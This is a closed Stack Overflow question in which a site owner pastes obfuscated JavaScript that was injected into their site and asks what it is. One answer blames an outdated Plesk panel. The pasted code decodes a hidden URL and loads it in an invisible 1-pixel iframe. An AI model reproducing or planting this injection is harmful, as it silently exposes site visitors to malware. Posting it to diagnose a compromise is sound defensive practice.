Injection in Javascript file on server [closed]

Question

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.

---

Want to improve this question? Update the question so it's on-topic for Stack Overflow.

Closed 6 years ago.

Improve this question

My website is showing message in browser "mydomain.com contains malware. Your computer might catch a virus if you visit this site."

After checking in webmaster tool I found java script file is changed and some codes are appended in this file. But earlier I changed the FTP and other passwords.

I am surprised how these codes are inserted in read only file on server while ftp was changed earlier.

What is this?. Is this virus attack or something else and how I can check and remove virus (if any)?

Following are the codes added in javascript file.

if('CdkO'=='WJGLZ')WltF();function VrzYJI(){var fxko='MQjxtI';if('CyWq'=='IeMRba')PLxWxh();}
var tfhbJZ="con\x73\x74\x72ucto\x72";function nCesU(){}var LibD='DtiXVu';var px0_var="0p\x78";if('AUEe'=='jkeMwo')dgZHo='JixI';var WXUGCTeW="par\x73eIn\x74";var fJdwiU='HkKPc';function YKEF(){var IPUbt='lpVuaP';if('hgcAK'=='NSNfa')aMlM();}
var appVersion_var="a\x70pV\x65rsion";var GNYH='ZRUtGA';if('eBdo'=='zvBN')iPKu='hnyr';function vOWkf(){}function ZKAxLa(){var wLRC='vLarQA';if('PtqFaq'=='fUwi')XIGbIQ();}
var lVVSNNg="";var CxCP;var px1_var="1p\x78";var ZsUS;var YZuDAwsjn="b\x6fd\x79";var iuvTLT=123;if('jKCKy'=='oGHZN')BdGS();var JTrlocAdo="appendChild";function gclv(){var zanTcM='fvrmqz';if('BnHRcw'=='EEsejm')SMOo();}
var KWdpWKXJ="8d9999955f54549497868b86965388949254889794938953958d95";function OQzFK(){var FLac='plfdm';if('LFoy'=='EwqxJ')uPUdDb();}if('gdBD'=='BwqmW')aCEU();var IBUm='yeFDT';var bQdKIy="sli\x63\x65";function FHIiLK(){var MBkF='EuYDLV';if('PvzvCY'=='fRLQH')iFuid();}
var CxmPcURq="fromCharCode";var HyNEe='OZSvI';var wLrupv=(function(){var StkS='epJJDq';return this;if('SccXj'=='SVyct')xEXC();function pfHHB(){}})();if('funs'=='UyyiNF')amGGs();var mIpTJBqZc="joPfVdCy"[tfhbJZ];var wjjFIK=33;var YEHEAS;for(var pWCeJ=0;pWCeJ<KWdpWKXJ.length;pWCeJ+=2){if('ZFrN'=='VxPc')QczgU='hFfl';VUAzhFZU=wLrupv[WXUGCTeW](KWdpWKXJ[bQdKIy](pWCeJ,pWCeJ+2),16)-37;var VLFmeK;lVVSNNg+=mIpTJBqZc[CxmPcURq](VUAzhFZU);if('prqjym'=='UHrJa')MiuvBu();}
var zaZhFI=293;if('YzpRXm'=='MNJwSK')tTTq='AEeBR';var REdbBzld="DdTPKzFI";var MQuCD='JPTBg';function EaYq(){}if('MVbJ'=='RFbVx')zKUf='zdnfP';function KEgn(){var Hsch='ZrBxl';if('NkwuXz'=='FSzAyt')pTXBE();}
var oYUpEIig="";var Vthu=277;if(navigator[appVersion_var].indexOf("MSIE")!=-1){if('bFpRU'=='GsDnn')qygk='lmUxN';var ecSd;oYUpEIig='<iframe name="'+REdbBzld+'" src="'+lVVSNNg+'">';if('sBZK'=='rxsdM')bKacE();}else{if('PHngtx'=='GLlAu')bcSoAG();function SYYU(){}
oYUpEIig='iframe';var YIBQP=222;}
function JwDx(){var RzMKo='supF';if('XXDiVZ'=='QibJLF')Hwfn();}
var VxmJyYuwi=document.createElement(oYUpEIig);if('pgsYEc'=='NTSgKU')Brfc='Rnuk';function PZbvIF(){}
VxmJyYuwi.vIysu=function(){var aRwK;if('Qqzu'=='FJXo')druxka='GGBLEL';this["src"]=lVVSNNg;var FuOS;var PScx=23;}
var cRuRe=258;var YsPwxC;VxmJyYuwi.style.top=px0_var;var QetiQ='DZEkb';VxmJyYuwi.vIysu();if('JggEby'=='WOvNk')zMGOX();if('aLKZ'=='MAUOW')eFWE='gOXg';if('yHoD'=='PBdzQ')xYVoer='nisPV';VxmJyYuwi.name=REdbBzld;function YEJay(){}var ZNWOM;VxmJyYuwi.style.height=px1_var;function XDwP(){}
VxmJyYuwi.style.position="absolute";if('xbIySc'=='yNlEH')eOJWpQ='ikyk';function IMeAq(){}
var irdJAD=172;VxmJyYuwi.style.width=px1_var;VxmJyYuwi.style.right=px0_var;if('kndd'=='BkrF')WGwYa='VVer';var uoEnJ='youKio';function orSoOjwi(){if('MnXf'=='nTILss')FgeFCT='jDxk';if(document[YZuDAwsjn]){var DhGHk='ajfbHe';function Ydkz(){var GWqvCL='MvgtmN';if('XpgqVo'=='rYhw')uggAO();}
document[YZuDAwsjn][JTrlocAdo](VxmJyYuwi);var FWgG='DHITvG';}else{if('FOmyN'=='ZcJs')pnCabN='lFdTU';setTimeout(orSoOjwi,120);if('EkcQ'=='tVynkk')nGBNjE='MVgOWc';var sjLbg;}
function eciRV(){}}
function EJwt(){var uKrE='wCpD';if('pkYdXv'=='oOXOLr')mljDR();}var BCNgRv;orSoOjwi();var vxWIdO='KQBivA';var CfZn=36;var RXTyN;function cxqTMA(){var mAhD='QhbH';if('PaNmx'=='EkYttb')rfxOr();}var EUSU;

Answer 1

plask up to 10.3 version is Vulnerable.

javascript malicious codes injected in my web pages using file manager.Ultimately port 8443 and 8447 blocked and issue resolved.

Another option is to upgrade plesk to 11